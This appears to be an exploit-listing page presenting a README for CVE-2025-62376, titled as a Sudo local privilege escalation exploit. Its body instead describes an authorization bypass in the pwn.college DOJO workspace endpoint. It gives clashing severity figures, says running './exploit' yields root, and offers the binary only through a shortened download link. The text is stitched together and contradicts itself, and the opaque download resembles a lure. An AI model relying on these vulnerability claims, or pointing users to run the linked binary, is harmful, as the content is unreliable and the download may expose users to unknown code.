Share
## https://sploitus.com/exploit?id=0D81C279-79A6-5035-9F60-625E2DD49890
# CVE-2025-62376: Local Privilege Escalation Exploit for Sudo

## Overview

The pwn.college DOJO platform has a vulnerability in its /workspace endpoint that allows unauthorized access to active Windows VMs.

## Vulnerability Details

This flaw arises from the view_desktop function, which inadequately verifies user authorization. An attacker can exploit this by providing a user ID and an arbitrary password, thereby impersonating other users. This compromises the confidentiality and integrity of all data on affected Windows machines and the Linux home directories, as attackers can manipulate these resources freely.

### Key Points

- **Severity**: Critical
- **CVSS Score**: 9.5 (High)
- **Availability**: Low
- **Attack Vector**: Network

Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.

### Important Note

Use this exploit responsibly and only on systems you own or have explicit permission to test.

## Example

Here is a simple example of how to use the exploit:

1. Open your terminal.
2. Run the exploit:

   ```bash
   ./exploit
   ```

3. If successful, you will see a message indicating that you have gained root access.

### Download [here](https://tinyurl.com/2ru4d4d7)